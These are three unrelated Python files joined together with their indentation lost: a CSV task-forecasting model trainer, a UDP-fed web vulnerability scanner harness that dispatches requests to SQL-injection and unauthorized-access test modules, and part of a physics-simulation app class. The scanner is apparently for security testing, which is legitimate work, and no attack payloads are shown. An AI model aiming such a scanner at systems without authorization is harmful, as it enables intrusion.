mymind=self.Open(file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
if mymind==False:
mymind=self.mind(4,5)
epo=1
else:
epo=1
r2=mymind.learnbook(tempreader,"TARGET",accuracy=self.accuraccy,epochs=epo,key=self.key,SECONDREAD=otherereader)
for row in self.source:
row=self.updaterow(row,r2,self.key,d)
self.Save(mymind,file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
self.csvwrite(r2,CSV=self.hiveloci + '\prognostication' + STRING + '_OUTPUT.csv',KEY=self.key,NEWKEY=self.renamekey)
csv=[]
#print(self.csvloci+'\Test_Records_' + STRING + '_OUTPUT.csv')
csv=self.csvopen(x=(self.csvloci+'\Test_Records_' + STRING + '_OUTPUT.csv'))
vale=mymind.testday(tempreader,self.accuraccy,"TARGET",key=self.key)
data={}
data["Type"]=d
data["Accuraccy"]=vale[0]
data["Loss Function"]=vale[1]
data["Date"]=self.today()
data["Variance Around Average"]=vale[3]
if vale[3]==0:
data["Hypothesis Test"]="Error in hypothesis test"
else:
data["Hypothesis Test"]=vale[1]/vale[3]
if vale[1]/vale[3] > 1:
self.innaccurate.append(d)
elif d in self.innaccurate:
self.innaccurate.remove(d)
data["Errors"]=vale[2]
csv.append(data)
self.csvwrite(csv,CSV=self.analysisloci +'\Test_Records_' + STRING + '_OUTPUT.csv',KEY="Type",NEWKEY=0)
#except:
# print(d)
# print("We found no instances of this to forecast, press enter too accept")
# input()
tempreader=[]
LOAD=''
concat=''
unload=[]
for row in self.source:
if len(row["end"]) == 0:
try:
unload=min(row["Forecast Dates"])
except:
print(row["Dates"])
print(row["Forecast Dates"])
input()
datarea={}
datarea[self.key]=row[self.key]
datarea["Next Task"]=unload
datarea["Date"]=self.today()
tempreader.append(datarea.copy())
self.csvwrite(tempreader,CSV=self.analysisloci + 'prognostication' + '_Next_Task_' + '_OUTPUT.csv',KEY=self.key,NEWKEY=self.renamekey)
self.uPDATE=0
print("Forecasting Numbers")
for d in self.numbers:
tempreader=[]
otherereader=[]
for row in self.source:
newrow={}
newrow[self.key]=row[self.key]
if len(row["end"])>0:
#print(row["Numbers"])
#print(row["end"])
#input()
newrow["TARGET"]=row["Numbers"][d]
else:
newrow["TARGET"]=None
for k in row["Labels"]:
if k !=d:
newrow[k]=row["Labels"][k]
if newrow["TARGET"]==None:
otherereader.append(newrow.copy())
elif isinstance(newrow["TARGET"],(int,float)):
tempreader.append(newrow.copy())
if len(tempreader) >0:
#try:
r2=[]
#print(d)
STRING=d.replace('/','-')
mymind=self.Open(file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
if mymind==False:
mymind=self.mind(4,5)
epo=1
else:
epo=1
r2=mymind.learnbook(tempreader,"TARGET",accuracy=self.accuraccy,epochs=epo,key=self.key,SECONDREAD=otherereader)
STRING=d.replace('/','-')
self.csvwrite(r2,CSV=self.hiveloci + '\prognostication' + STRING + '_OUTPUT.csv',KEY=self.key,NEWKEY=self.renamekey)
self.Save(mymind,file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
#except:
# print(d)
# print("We found no instances of this to forecast, press enter too accept")
# input()
csv=[]
csv=self.csvopen(x=(self.csvloci+'\Test_Records_' + STRING + '_OUTPUT.csv'))
vale=mymind.testday(tempreader,self.accuraccy,"TARGET",key=self.key)
data={}
data["Type"]=d
data["Accuraccy"]=vale[0]
data["Loss Function"]=vale[1]
data["Date"]=self.today()
data["Variance Around Average"]=vale[3]
if vale[3]==0:
data["Hypothesis Test"]="Error in hypothesis test"
else:
data["Hypothesis Test"]=vale[1]/vale[3]
if vale[1]/vale[3] > 1:
self.innaccurate.append(d)
elif d in self.innaccurate:
self.innaccurate.remove(d)
data["Errors"]=vale[2]
csv.append(data)
self.csvwrite(csv,CSV=self.analysisloci + '\Test_Records_' + STRING + '_OUTPUT.csv',KEY="Type",NEWKEY=0)
self.swarmin=0
print("Innaccurate models detected")
print(self.innaccurate)
def Save(self,a,file_Name):
import pickle
fileObject = open(file_Name,'wb')
pickle.dump(a,fileObject)
fileObject.close()
def Open(self,file_Name):
import os.path
if os.path.isfile(file_Name)==True:
import pickle
fileObject = open(file_Name,'rb')
try:
b = pickle.load(fileObject,encoding="utf8")
return b
except:
print(file_Name)
print("got a error in opening pickle RESTARTING FILE")
return False
else:
return False
def updaterow(self,row,r2,key,d,look="Forecast Dates",error=0):
for r in r2:
if row[self.key]==r[self.key]:
if r["ESTIMATE"] !="None response from AI, unrecognised engram - pleaser forecast manually":
row[look][d]=r["ESTIMATE"]
return row
return row
def isdate(self,check):
from datetime import datetime
try:
h=check.split('/')
x=datetime(int(h[2]), int(h[1]), int(h[0]), 0, 0, 0, 0)
return True
except:
return False
def today(self):
from datetime import datetime
check = datetime.now()
return (str(check.day)+'/'+str(check.month)+'/'+str(check.year))
def tryfindcmrdates(self,a,b):
from datetime import datetime
try:
h=a.split('/')
x=datetime(int(h[2]), int(h[1]), int(h[0]), 0, 0, 0, 0)
t=b.split('/')
t=datetime(int(t[2]), int(t[1]), int(t[0]), 0, 0, 0, 0)
dt = t - x
return dt.days
except:
return None
def csvwrite(self,reader,CSV='C:\CSVs\OUTPUT.csv',KEY=0,NEWKEY=0):
import csv
fieldnombre=[]
for row in reader:
for cell in row:
if not cell in fieldnombre:
fieldnombre.append(cell)
if NEWKEY !=0:
try:
fieldnombre.remove(KEY)
except:
pass
fieldnombre.append(NEWKEY)
for row in reader:
row[NEWKEY]=row.get(KEY)
frame=[]
with open(CSV, 'w', newline='') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=',',
quotechar='"', quoting=csv.QUOTE_MINIMAL)
spamwriter.writerow(fieldnombre)
for row in reader:
frame=[]
for field in fieldnombre:
frame.append(row.get(field))
spamwriter.writerow(frame.copy())
csvfile.close()
def csvopen(self,x):
import csv
import os.path
if os.path.isfile(x)==False:
return []
with open(x, newline='') as csvfile:
data = csv.DictReader(csvfile)
reader = [item for item in data]
newreader=[]
data=None
count=0
return reader
def randomdata(self):
import random
for row in self.source:
for d in self.dates:
row["Forecast Dates"][d]=random.randint(0,120)
for n in self.numbers:
row["Forecast Numbers"][d]=random.randint(0,120)
def multitest(self,reader,tag):
innaccurate=[]
def makeworksheet(typo,reader,num):
newreader=[]
if num==True:
for row in reader:
if self.key in row:
newrow={}
try:
newrow[self.key]=row[self.key]
except:
print(row)
print(newrow)
input("error in makeworksheet")
if isinstance(row[typo],(int,float)):
newrow["TARGET"]=self.tryfindcmrdates(row[self.startdate],row[typo])
for k in self.kill:
if k in row:
if isinstance(row[k],str):
if not self.isdate(row[k]):
if not len(row[k])==0:
newrow[k]=str(k)+':' +str(row[k])
newreader.append(newrow.copy())
else:
for row in reader:
if self.key in row:
newrow={}
try:
newrow[self.key]=row[self.key]
except:
print(row)
print(newrow)
input("error in makeworksheet")
if self.isdate(row[self.startdate]):
if self.isdate(row[typo]):
newrow["TARGET"]=self.tryfindcmrdates(row[self.startdate],row[typo])
for k in self.kill:
if k in row:
if isinstance(row[k],str):
if not self.isdate(row[k]):
if not len(row[k])==0:
newrow[k]=str(k)+':' +str(row[k])
newreader.append(newrow.copy())
return newreader
for d in self.dates:
tempreader=makeworksheet(d,reader,False)
print("multitest")
print(d)
print(len(tempreader))
if len(tempreader)>0:
STRING=d.replace('/','-')
mymind=self.Open(file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
csv=[]
csv=self.csvopen(x=(self.csvloci+'\Test_Records_' + STRING + '_OUTPUT.csv'))
try:
vale=mymind.testday(tempreader,self.accuraccy,"TARGET",key=self.key)
except:
print(vale)
input("error")
data={}
data["Type"]=d
data["Accuraccy"]=vale[0]
data["Loss Function"]=vale[1]
data["Date"]=self.today()
data["Tag"]=tag
data["Variance Around Average"]=vale[3]
if vale[3]==0:
data["Hypothesis Test"]="Error in hypothesis test"
else:
data["Hypothesis Test"]=vale[1]/vale[3]
if vale[1]/vale[3] > 1:
innaccurate.append(d)
data["Errors"]=vale[2]
csv.append(data)
self.csvwrite(csv,CSV=self.analysisloci + '\Test_Records_' + STRING + '_OUTPUT.csv',KEY="Type",NEWKEY=0)
for d in self.numbers:
tempreader=makeworksheet(d,reader,True)
print("multitest")
print(d)
print(len(tempreader))
if len(tempreader)>0:
STRING=d.replace('/','-')
mymind=self.Open(file_Name=self.geniusloci + '\prognostication' + STRING + '_BRAININAJAR')
csv=[]
csv=self.csvopen(x=(self.csvloci+'\Test_Records_' + STRING + '_OUTPUT.csv'))
vale=mymind.testday(tempreader,self.accuraccy,"TARGET",key=self.key)
data={}
data["Type"]=d
data["Accuraccy"]=vale[0]
data["Loss Function"]=vale[1]
data["Date"]=self.today()
data["Tag"]=tag
data["Variance Around Average"]=vale[3]
if vale[3]==0:
data["Hypothesis Test"]="Error in hypothesis test"
else:
data["Hypothesis Test"]=vale[1]/vale[3]
if vale[1]/vale[3] > 1:
innaccurate.append(d)
data["Errors"]=vale[2]
csv.append(data)
self.csvwrite(csv,CSV=self.analysisloci + '\Test_Records_' + STRING + '_OUTPUT.csv',KEY="Type",NEWKEY=0)
print("Inaccuracies in Historic Data Found")
print(innaccurate)
def workplanner(self,setcritdelay=0,setalerts=0,taskmove=0,setpercntile=0,setdependency=0):
averageburndown={}
countdates={}
burndown=0
evaluate=[]
csv=[]
csv=self.csvopen(x=(self.hiveloci+'\RESOURCE PLAN.csv'))
if len(csv)==0:
for d in self.dates:
newrow={}
newrow["Type"]=d
csv.append(newrow.copy())
self.csvwrite(csv,CSV=(self.csvloci+'\RESOURCE PLAN.csv'),KEY=0,NEWKEY=0)
newrow={}
dat={}
for c in csv:
dat[c['Task']]={}
for s in c:
if s !=dat[c['Task']]:
dat[c['Task']][s]=c[s]
for row in self.source:
if len(row[self.startdate])>0:
if len(row["end"])==0:
todah=self.tryfindcmrdates(row[self.startdate],self.today())
for d in row["Forecast Dates"]:
if not d in self.innaccurate:
if row["Dates"][d]==None:
if not d in row["Labels"]:
count=1
check=1
reforecast=0
newrow={}
for e in row["Forecast Dates"]:
if not e in self.innaccurate:
if e !=d:
if not e in row["Labels"]:
if row["Forecast Dates"][e]!=None:
if row["Dates"][e]!= None and row["Forecast Dates"][d]>row["Dates"][e]:
count+=1
elif row["Forecast Dates"][d]>row["Forecast Dates"][e]:
count+=1
if row["Dates"][e]==None:
check+=1
burndown=row["Forecast Dates"][d]/count
if burndown < 0 or burndown==row["Forecast Dates"][d]:
burndown=0
reforecast=round(todah+(check*burndown))
newrow[self.renamekey]=row[self.key]
newrow["Reforecast"]=reforecast
newrow["Burndown"]=burndown
newrow["Type"]=d
newrow["Previous Tasks"]=count
newrow["Original Forecast"]=row["Forecast Dates"][d]
newrow["Previous Tasks Remainder"]=check
if todah > row["Forecast Dates"][d]:
if todah > (row["Forecast Dates"][d]*1.5):
newrow["Late Flag"]="Late - long delay"
else:
newrow["Late Flag"]="Late"
elif reforecast < row["Forecast Dates"][d]:
newrow["Late Flag"]="Running Ahead"
elif (row["Forecast Dates"][d]-reforecast)<burndown:
newrow["Late Flag"]="On Schedule"
else:
newrow["Late Flag"]="Behind Schedule"
if d in dat:
for a in dat[d]:
if a !=d:
newrow[a]=dat[d][a]
evaluate.append(newrow.copy())
self.csvwrite(evaluate,CSV=(self.hiveloci+'\prognostication_REFORECAST.csv'),KEY=0,NEWKEY=0)
def scheduletests(self):
csv=[]
import collections
for me in self.dates:
import random
ra=[]
for m in range(20):
ra.append(m)
print(ra)
ra=random.sample(ra,len(ra))
print(ra)
for L in range(1):
for r in ra:
for b in ra:
for d in ra:
for w in ra:
newrow=collections.OrderedDict()
newrow["Type"]=me
newrow["width"]=w+1
newrow["depth"]=d+1
newrow["resistance"]=r/10
newrow["bayeslearningrate"]=b+1
newrow["linearegression"]=L
newrow["epochs"]=1
newrow["n"]=False
yield newrow
for d in self.numbers:
for l in range(1):
for r in ra:
for b in ra:
for d in ra:
for w in ra:
newrow=collections.OrderedDict()
newrow["Type"]=d
newrow["width"]=w+1
newrow["depth"]=d+1
newrow["resistance"]=r/10
newrow["bayeslearningrate"]=b+1
newrow["linearegression"]=l
newrow["epochs"]=1
newrow["n"]=True
yield newrow
def makeworksheet(self,d,reader,num):
if num==True:
tempreader=[]
otherereader=[]
for row in self.source:
newrow={}
newrow[self.key]=row[self.key]
if len(row["end"])>0:
#print(row["Numbers"])
#print(row["end"])
#input()
newrow["TARGET"]=row["Numbers"][d]
else:
newrow["TARGET"]=None
for k in row["Labels"]:
if k !=d:
newrow[k]=row["Labels"][k]
if newrow["TARGET"]!=None:
if newrow["TARGET"] > 0:
otherereader.append(newrow.copy())
else:
tempreader.append(newrow.copy())
else:
tempreader=[]
otherereader=[]
for row in self.source:
if not d in row["Labels"]:
newrow={}
newrow["TARGET"]=row["Dates"][d]
for k in row["Labels"]:
if k !=d:
newrow[k]=row["Labels"][k]
newrow[self.key]=row[self.key]
if newrow["TARGET"]==None:
otherereader.append(newrow.copy())
else:
if newrow["TARGET"] < 0:
newrow["TARGET"]=0
tempreader.append(newrow.copy())
return [tempreader,otherereader]
def queen(self,overide=0):
def chack(reader,find):
for row in reader:
if row["Type"]==find:
return True
return False
def getacc(tye):
STRING=tye.replace('/','-')
try:
CSV=self.csvopen(self.analysisloci + '\Test_Records_' + STRING + '_OUTPUT.csv')
except:
return False
ROW=CSV[(len(CSV)-1)]
vale=[]
vale.append(float(ROW["Loss Function"]))
vale.append(eval(ROW["Accuraccy"]))
vale.append((len(CSV)))
return vale
bestwidth=0
otherereader=[]
tempreader=[]
val1=[]
val2=[]
import random
import collections
comptests=[]
#def __init__(self,width,depth,repeat=0,resistance=0,bayeslearningrate=10,linearegression=0):
#def labotomy(self,width=[4,4,4,4,4],typo=['r','r','r','r','r','r'],resistance=[0,0,0,0,0,0],bayeslearningrate=[10,10,10,10,10]):
csv=self.csvopen(x=(self.csvloci+'\Test_Records_SCHEDULED_TESTS.csv'))
newcsv=[]
ty=''
for row in csv:
if len(row["date"])>0:
work=[]
if not ty ==row["Type"]:
ty =row["Type"]
tempreader=[]
otherereader=[]
work=self.makeworksheet(row["Type"],self.source,row["number"])
tempreader=work[0]
otherereader=work[1]
testmind=self.mind(width=int(row["width"]),depth=int(row["depth"]),resistance=int(row["resistance"]),bayeslearningrate=int(row["bayeslearningrate"]),linearegression=int(row["linearegression"]))
try:
if len(row["labotomy.width"]) > 0:
testmind.labotomy(width=eval(row["labotomy.width"]),depth=eval(row["labotomy.width"]),resistance=int(row["labotomy.resistance"]),bayeslearningrate=eval(row["labotomy.bayeslearningrate"]),linearegression=eval(row["labotomy.linearegression"]))
except:
pass
testmind.learnbook(tempreader,"TARGET",accuracy=int(row["accuracy"]),epochs=int(row["epochs"]),key=self.key,SECONDREAD=otherereader)
val1=getacc(row["Type"])
val1e=testmind.testday(tempreader,int(row["accuracy"]),"TARGET",key=self.key)
row["percentage"]=val1e[0]
row["loss function"]=val1e[1]
row["date"]=self.today()
if val1e[0] > val1[0] and val1e[1] > val1[1]:
row["acceptance"]=1
STRING=str(row["Type"])
STRING=STRING.replace('/','-')
self.Save(testmind,file_Name=r'C:\CSVs\BrainsInAJar\prognostication' + STRING + '_BRAININAJAR')
row["Test passed type"]="Scheduled Test Passed"
comptests.append(row.copy())
self.csvwrite(comptests,CSV=(self.csvloci+'\Test_Records_COMPLETED_TESTS.csv'),KEY=0,NEWKEY=0)
else:
row["acceptance"]=0
c=0
import time
if len(comptests)==0:
genny=self.scheduletests()
ty=''
for row in genny:
work=[]
if ty !=row["Type"]:
tempreader=[]
otherereader=[]
ty =row["Type"]
work=self.makeworksheet(row["Type"],self.source,row["n"])
tempreader=work[0]
otherereader=work[1]
val1=getacc(row["Type"])
testmind=self.mind(width=int(row["width"]),depth=int(row["depth"]),resistance=int(row["resistance"]),bayeslearningrate=int(row["bayeslearningrate"]),linearegression=int(row["linearegression"]))
testmind.learnbook(tempreader,"TARGET",accuracy=self.accuraccy,epochs=val1[2],key=self.key,SECONDREAD=otherereader)
count=0
val1e=testmind.testday(tempreader,self.accuraccy,"TARGET",key=self.key)
row["percentage original"]=val1e[0]
row["loss function"]=val1e[1]
row["date"]=self.today()
print("%")
print(val1e[0])
print("old")
print(val1[1])
print("loss")
print(val1e[1])
print("old")
print(val1[0])
print("epochs")
print(val1[2])
print(len(tempreader))
print(len(otherereader))
print(str(row["depth"]))
print(str(row["width"]))
print(str(row["resistance"]))
print(str(row["bayeslearningrate"]))
if val1e[0] > val1[1] and val1e[1] < val1[0]:
val1[1]=val1e[0]
val1[0]=val1e[1]
print("upgrade")
row["acceptance"]=1
STRING=str(row["Type"])
STRING=STRING.replace('/','-')
print(STRING)
self.Save(testmind,file_Name=r'C:\CSVs\BrainsInAJar\prognostication' + STRING + '_BRAININAJAR')
row["Test passed type"]="Auto Generated Test Passed"
comptests.append(row.copy())
self.csvwrite(comptests,CSV=(self.csvloci+'\Test_Records_COMPLETED_TESTS.csv'),KEY=0,NEWKEY=0)
csv=self.csvopen(x=(self.csvloci+'\Test_Records_COMPLETED_TESTS.csv'))
for row in csv:
testmind=mind(width=int(row["width"]),depth=int(row["width"]),resistance=int(row["resistance"]),bayeslearningrate=int(row["bayeslearningrate"]),linearegression=int(row["linearegression"]))
if len(row["labotomy.width"]) > 0:
testmind.labotomy(width=eval(row["labotomy.width"]),depth=eval(row["labotomy.width"]),resistance=int(row["labotomy.resistance"]),bayeslearningrate=eval(row["labotomy.bayeslearningrate"]),linearegression=eval(row["labotomy.linearegression"]))
c=float(inf)
d=0
work=self.makeworksheet(row["Type"],self.source)
tempreader=work[0]
otherereader=work[1]
testmind.learnbook(tempreader,"TARGET",accuracy=int(row["accuraccy"]),epochs=1,key=self.key,SECONDREAD=otherereader)
vale=testmind.testday(tempreader,int(row["accuraccy"]),"TARGET",key=self.key)
count=1
while vale[1] < c and vale[2] > d:
testmind.learnbook(tempreader,"TARGET",accuracy=int(row["accuraccy"]),epochs=1,key=self.key,SECONDREAD=otherereader)
vale=testmind.testday(tempreader,int(row["accuraccy"]),"TARGET",key=self.key)
count+=1
count-=1
newrow=row.copy()
newrow["epochs"]=count
self.Save(testmind,file_Name=self.geniusloci + '\prognostication' + str(row["Type"]) + '_BRAININAJAR')
newrow["Test passed type"]="Evaluation of earlystopping"
csv.append(newrow.copy())
self.csvwrite(csv,CSV=(self.csvloci+'\Test_Records_COMPLETED_TESTS.csv'),KEY=0,NEWKEY=0)
self.queenIN=0
def timestamp(self):
import datetime
now = datetime.datetime.now()
print(now)
def readmaker(x=0,kill=[],educational=[],ConverTOstrings=[]):
import csv
import random
import datetime
now = datetime.datetime.now()
if len(str(now.month))==1:
t='0'+str(now.month)
else:
t=str(now.month)
if len(str(now.day))==1:
y='0'+str(now.day)
else:
y=str(now.day)
if x==0:
x='\\\\wcrwvfilprd01\\shared$\\Telecoms Reporting\\QlikView nPrinting Output\\CMR\\IS_CMR_' + str(now.year) + '-' + t + '-' + y + '.csv'
def infermeaning(reader,column):
text=''
textlist=[]
corpuscount={}
count=0
average=0
import math
for row in reader:
intext=[]
text=row.get(column)
if text !='':
if text:
textlist=text.split()
for t in textlist:
count+=1
if t in corpuscount:
corpuscount[t]+=1
else:
corpuscount[t]=1
for c in corpuscount:
corpuscount[c]=math.log(count/corpuscount[c])
average+=corpuscount[c]
average=average/count
newcorpuscount={}
for c in corpuscount:
if corpuscount[c] > average:
newcorpuscount[c]=corpuscount[c]
for row in reader:
text=row.get(column)
textlist=text.split()
for t in text:
if t in newcorpuscount:
row[t]=t
del row[column]
return reader
with open(x, newline='') as csvfile:
data = csv.DictReader(csvfile)
reader = [item for item in data]
newreader=[]
data=None
count=0
for row in reader:
for k in kill:
try:
del row[k]
except:
pass
for con in ConverTOstrings:
row["StrVer:"+str(con)]=con + ':' + str(row[con])
for e in educational:
reader=infermeaning(reader,e)
return reader
def ratiosplit(reader,ratio):
count=0
ratioreader=[]
oldreader=[]
for row in reader:
count+=1
newrow=row.copy()
if count % ratio==0:
ratioreader.append(newrow)
else:
oldreader.append(newrow)
return [oldreader,ratioreader]
#SECTION TO SETUP FOR YOUR OWN DATA - ONE # = CODE LINE MULTIPLE ###### NOTES
#####DECLARE TIME
##NOW=datetime.datetime.now()
#print(datetime.datetime.now())
##### ADD NAME OF FIELD TO CONVERTS TO CONVERT SOMETHING TO STRING
#converts=[]
##### EDUCATIONAL WILL SPLIT A COMMENTS FIELD
#edX=[]
##### KILL WILL DROP A FIELD
#kill=[]
##### x IS required as a raw string to indicate the string of the filepath where the CSV you want it to use exists
#x=r''
##### below line creates a list containing ordered dicts from a CSV that represents the
#r=readmaker(x=x,kill=kill,educational=edX,ConverTOstrings=converts)
##### splits data, assumes a ratio of 5 learn to 1 test change to taste, relies on data output being sorted. Hint i suggest sort on key
#r=ratiosplit(r,5)
#r2=r[1]
#r=r[0]
##### relies on knowing the key for the CSV need to
#lockpick='KEY FOR WORK NEEDS  before string of key'
#update='KEY FOR WORK DOES NOT NEED NEEDS  before string of key - RENAMES KEY AND REMOVES  FOR FINAL OUTPUT'
##### START AND END
#START='FIELD NAME OF START DATE'
#END='FIELD NAME OF END DATE'
#ACCURACY=NUMBER OF DAYS YOU FIND AN ACCEPTABLE "CORRECT FORECAST"
#csvloci=
#csvloci=SUGGESTED: r'C:\CSVs\\' FILE LOCATION TO OUTPUT DATA AND BBUILD DATABASE AS LONG AS POINTED AT SAME LOCATION AT TIME WILL REUSE SAME AI
##### THE CODE THAT BUILDS MINDS DONT CHANGE UUNLESS READ THE FULL CODE
#for i in range(100):
# countalot+=1
# myhive=hivemind(r,lockpick,START,END,update,start=1,accuracy=ACCURACY,csvloci=csvloci)
# myhive.multitest(r2,str("Random Test "+str(datetime.datetime.now())+" (1 in 5 chosen to test) Epoch: " + str(countalot)))
#print((datetime.datetime.now()-NOW))
|
mossbackScaner.py
|
# -*- coding: utf-8 -*-
# version: 0.2
# date: 2020.09.22
import json
import re
import socket
import sys
import http.client
import time
import threading
from socket import *
from time import ctime
import hashlib
import subprocess
from subprocess import PIPE
from scanner_sqli import test_sqli
from scanner_unauth_access import test_unauth_access
from color_print import *
global glo_conf
global glo_pkg_list
global glo_lock
global glo_scanner
def scanner_factory(name):
return eval(name + "()")
with open('config.json', 'r') as fp:
glo_conf = json.loads(fp.read())
glo_pkg_list = []
glo_lock = threading.Lock()
glo_scanner = []
glo_scanner.append(scanner_factory("test_sqli"))
glo_scanner.append(scanner_factory("test_unauth_access"))
def do_scan_thread():
global glo_pkg_list
global glo_lock
global glo_scanner
while True:
glo_lock.acquire()
if len(glo_pkg_list) > 0:
pkg = json.loads(glo_pkg_list.pop(0))
glo_lock.release()
# do all test here
for fun in glo_scanner:
fun.run(pkg['method'], pkg['uri'], pkg['version'],
pkg['header'], pkg['body'], pkg['host'])
# test finished
else:
glo_lock.release()
time.sleep(1)
def main():
global glo_pkg_list
global glo_lock
global glo_conf
t = threading.Thread(target=do_scan_thread, args=())
t.start()
BUFSIZ = 1024
ADDRESS = ('', glo_conf['scanner_port'])
udpServerSocket = socket(AF_INET, SOCK_DGRAM)
udpServerSocket.bind(ADDRESS)
while True:
# pack_meta = pack_len(4 B) + pack_hash(32 B)
pack_meta, pack_from = udpServerSocket.recvfrom(36)
pack_meta = pack_meta.decode()
pack_data = ''
for i in range(int(pack_meta[:4])):
data, _ = udpServerSocket.recvfrom(BUFSIZ)
pack_data += data.decode()
m = hashlib.md5()
m.update(pack_data.encode())
if pack_meta[4:] != m.hexdigest():
printDarkRed("[ERROR] the hash of received message incorrect.")
udpServerSocket.sendto("ER".encode('utf-8'), pack_from)
else:
udpServerSocket.sendto("OK".encode('utf-8'), pack_from)
glo_lock.acquire()
glo_pkg_list.append(pack_data)
glo_lock.release()
udpServerSocket.close()
if __name__ == "__main__":
main()
|
app.py
|
# coding=utf-8
from __future__ import print_function
import inspect
import logging
import numbers
import os
import sys
import threading
import time
import warnings
from os.path import isfile
import numpy as np
import six
from phi import struct
from phi.data.fluidformat import Scene, write_sim_frame
from phi.physics.field import CenteredGrid, Field, StaggeredGrid
from phi.physics.world import StateProxy, world
from phi.viz.plot import PlotlyFigureBuilder
from .control import Action, Control
from .value import (EditableBool, EditableFloat, EditableInt, EditableString, EditableValue)
def synchronized_method(method):
outer_lock = threading.Lock()
lock_name = '__' + method.__name__ + '_lock' + '__'
def sync_method(self, *args, **kws):
with outer_lock:
if not hasattr(self, lock_name):
setattr(self, lock_name, threading.Lock())
lock = getattr(self, lock_name)
with lock:
return method(self, *args, **kws)
return sync_method
class TimeDependentField(object):
def __init__(self, name, generator):
self.name = name
self.generator = generator
self.array = None
self.invalidation_version = -1
@synchronized_method
def get(self, invalidation_version):
if invalidation_version != self.invalidation_version:
self.array = self.generator()
self.invalidation_version = invalidation_version
return self.array
class App(object):
def __init__(self,
name=None,
subtitle='',
fields=None,
stride=None,
record_images=False, record_data=False,
base_dir='~/phi/data/',
recorded_fields=None,
summary=None,
custom_properties=None,
target_scene=None,
objects_to_save=None,
framerate=None,
dt=1.0):
self.start_time = time.time()
self.name = name if name is not None else self.__class__.__name__
self.subtitle = subtitle
self.summary = summary if summary else name
if fields:
self.fields = {name: TimeDependentField(name, generator) for (name, generator) in fields.items()}
else:
self.fields = {}
self.message = None
self.steps = 0
self._invalidation_counter = 0
self._controls = []
self._actions = []
self._traits = []
self.prepared = False
self.current_action = None
self._pause = False
self.detect_fields = 'default' # False, True, 'default'
self.world = world
self.dt = dt
# Setup directory & Logging
self.objects_to_save = [self.__class__] if objects_to_save is None else list(objects_to_save)
self.base_dir = os.path.expanduser(base_dir)
if not target_scene:
self.new_scene()
self.uses_existing_scene = False
else:
self.scene = target_scene
self.uses_existing_scene = True
if not isfile(self.scene.subpath('info.log')):
log_file = self.log_file = self.scene.subpath('info.log')
else:
index = 2
while True:
log_file = self.scene.subpath('info_%d.log' % index)
if not isfile(log_file):
break
else:
index += 1
# Setup logging
logFormatter = logging.Formatter('%(message)s (%(levelname)s), %(asctime)sn\n')
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.WARNING)
customLogger = logging.Logger('app', logging.DEBUG)
fileHandler = logging.FileHandler(log_file)
fileHandler.setFormatter(logFormatter)
customLogger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logFormatter)
consoleHandler.setLevel(logging.INFO)
customLogger.addHandler(consoleHandler)
self.logger = customLogger
# Recording
self.record_images = record_images
self.record_data = record_data
self.recorded_fields = recorded_fields if recorded_fields is not None else []
self.rec_all_slices = False
self.sequence_stride = stride if stride is not None else 1
self.framerate = framerate if framerate is not None else stride
self._custom_properties = custom_properties if custom_properties else {}
self.figures = PlotlyFigureBuilder()
self.info('App created. Scene directory is %s' % self.scene.path)
def new_scene(self, count=None):
if count is None:
count = 1 if self.world.batch_size is None else self.world.batch_size
self.scene = Scene.create(self.base_dir, self.scene_summary(), count=count, mkdir=True)
@property
def directory(self):
return self.scene.path
@property
def image_dir(self):
return self.scene.subpath('images')
def get_image_dir(self):
return self.scene.subpath('images', create=True)
def progress(self):
self.step()
self.steps += 1
self.invalidate()
def invalidate(self):
self._invalidation_counter += 1
def step(self):
world.step(dt=self.dt)
@property
def fieldnames(self):
return sorted(self.fields.keys())
def get_field(self, fieldname):
if fieldname not in self.fields:
raise KeyError('Field %s not declared. Available fields are %s' % (fieldname, self.fields.keys()))
return self.fields[fieldname].get(self._invalidation_counter)
def add_field(self, name, value):
assert not self.prepared, 'Cannot add fields to a prepared model'
if isinstance(value, StateProxy):
def current_state():
return value.state
generator = current_state
elif callable(value):
generator = value
else:
assert isinstance(value, (np.ndarray, Field, float, int)), 'Unsupported type for field "%s": %s' % (name, type(value))
def get_constant():
return value
generator = get_constant
self.fields[name] = TimeDependentField(name, generator)
@property
def actions(self):
return self._actions
def add_action(self, name, methodcall):
self._actions.append(Action(name, methodcall, name))
def run_action(self, action):
message_before = self.message
action.method()
self.invalidate()
message_after = self.message
if message_before == message_after:
if self.message is None or self.message == '':
self.message = display_name(action.name)
else:
self.message += ' | ' + display_name(action.name)
@property
def traits(self):
return self._traits
def add_trait(self, trait):
assert not self.prepared, 'Cannot add traits to a prepared model'
self._traits.append(trait)
@property
def controls(self):
return self._controls
def prepare(self):
if self.prepared:
return
logging.info('Gathering model data...')
# Controls
for name in self.__dict__:
val = getattr(self, name)
editable_value = None
if isinstance(val, EditableValue):
editable_value = val
setattr(self, name, val.initial_value) # Replace EditableValue with initial value
elif name.startswith('value_'):
value_name = display_name(name[6:])
dtype = type(val)
if dtype == bool:
editable_value = EditableBool(value_name, val)
elif isinstance(val, numbers.Integral): # Int
editable_value = EditableInt(value_name, val)
elif isinstance(val, numbers.Number): # Float
editable_value = EditableFloat(value_name, val)
elif isinstance(val, six.string_types):
editable_value = EditableString(value_name, val)
if editable_value:
self._controls.append(Control(self, name, editable_value))
# Actions
for method_name in dir(self):
if method_name.startswith('action_') and callable(getattr(self, method_name)):
self._actions.append(Action(display_name(method_name[7:]), getattr(self, method_name), method_name))
# Default fields
if len(self.fields) == 0:
self._add_default_fields()
# Scene
self._update_scene_properties()
source_files_to_save = set()
for object in self.objects_to_save:
try:
source_files_to_save.add(inspect.getabsfile(object))
except TypeError:
pass
for source_file in source_files_to_save:
self.scene.copy_src(source_file)
# End
self.prepared = True
return self
def _add_default_fields(self):
def add_default_field(trace):
field = trace.value
if isinstance(field, (CenteredGrid, StaggeredGrid)):
def field_generator():
world_state = self.world.state
return trace.find_in(world_state)
self.add_field(field.name[0].upper() + field.name[1:], field_generator)
return None
struct.map(add_default_field, self.world.state, leaf_condition=lambda x: isinstance(x, (CenteredGrid, StaggeredGrid)), trace=True, content_type=struct.INVALID)
def add_custom_property(self, key, value):
